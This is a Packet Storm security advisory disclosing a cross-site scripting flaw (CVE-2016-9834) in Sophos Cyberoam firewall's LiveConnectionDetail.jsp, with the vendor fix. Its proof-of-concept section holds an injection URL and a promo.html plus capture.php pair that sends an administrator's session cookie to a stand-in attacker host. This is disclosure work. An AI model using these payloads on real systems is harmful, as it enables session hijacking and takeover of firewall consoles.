exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sophos Cyberoam Cross Site Scripting

Sophos Cyberoam Cross Site Scripting
Posted Jun 7, 2017
Authored by Bhadresh Patel

Sophos Cyberoam with firmware versions 10.6.4 and below suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2016-9834
SHA-256 | 50b3c7902e0d603f5af08aca807d3561adfe90503a0f0a02d2501fb11b1186e3

Sophos Cyberoam Cross Site Scripting

Change Mirror Download
Title:
====

Sophos Cyberoam Cross-site scripting (XSS) vulnerability

Credit:
======

Name: Bhadresh Patel


Date:
====

25/05/2017 (dd/mm/yyyy)

Vendor:
======

More than 100 million users in 150 countries rely on Sophos to offer end-to-end protection against complex threats and data loss. Sophos is committed to providing complete, enterprise-grade security solutions that are simple to deploy, manage and use, and deliver one of the industry's lowest total cost of ownership. Sophos offers award-winning security solutions covering endpoint, mobile, server, encryption, web, email, Wi-Fi, and UTM/next-generation firewall, all backed by SophosLabs -- a global threat analysis center which provides real-time cloud-enabled security intelligence. Sophos is headquartered in Oxford, UK.

Vulnerable Product:
==============

Sophos Cyberoam Firewall

Cyberoam Next-Generation Firewalls are based on CyberoamOS an intelligent and powerful firmware that offers next-generation security features include inline application inspection and control, website filtering, HTTPS inspection, Intrusion Prevention System, VPN (IPSec and SSL) and QoS/bandwidth management. Additional security features like Web Application Firewall, Gateway Anti-Virus, Gateway Anti-Spam are also available.

Customer Product link: https://www.cyberoam.com


Abstract:
=======

Cross-site scripting (XSS) vulnerability in Sophos Cyberoam firewall enables and attackers to execute scripts in a victims browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the users browser using malware, etc.



Affected Software Version:
=============

<= Firmware Version 10.6.4


Vendor Response
=============

Sophos is committed to working with the security community in identifying, remediating and communicating security issues in our products. Customers are advised to upgrade their Cyberoam OS to v.10.6.5, which addresses this issue.

Exploitation-Technique:
===================

Remote


Severity Rating (CVSS):
===================

6.9 (Medium) (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)


CVE ID:
=======

CVE-2016-9834

Details:
=======
This vulnerability allows remote attackers to execute arbitrary client side script in the active users browser session, when logged into the Cyberoam firewall. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of request to LiveConnectionDetail.jsp application. GET parameters applicationname and username are improperly sanitized allowing an attacker to inject arbitrary javascript into the page. This can be abused by an attacker to perform a cross-site scripting attack on the user.


Vulnerable module/page/application: /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp

Vulnerable parameters: applicationname and username



PoC
=======

http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449";alert(document.cookie)//181&username=NA

PoC Video
=========

https://www.youtube.com/watch?v=NmLPL2TYPcg

Real world scenario

1) Victim (Admin) login to the Sophos Cyberoam web console
2) Sophos Cyberoam FW is on a latest version
3) record.txt is empty on attacker page
4) Victim (Admin) visits attacker URL/page

http://www.attacker.com/promo.html

5) XSS successful and attacker captured cookie in record.txt



-------------------------- Source code (promo.html) ----------------------------------
<html>
<head>
<script>
window.location="http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\";document.location='http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA"
</script>
</body>
</html>
-------------------------- Source code (capture.php) ----------------------------------

<?php
file_put_contents('record.txt', $_GET['content']);
echo "<HTML><body><script>window.location=\"http://192.168.30.30/corporate/webpages/index.jsp\"</script></body></HTML>"
?>



Credits:
=======

Bhadresh Patel
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close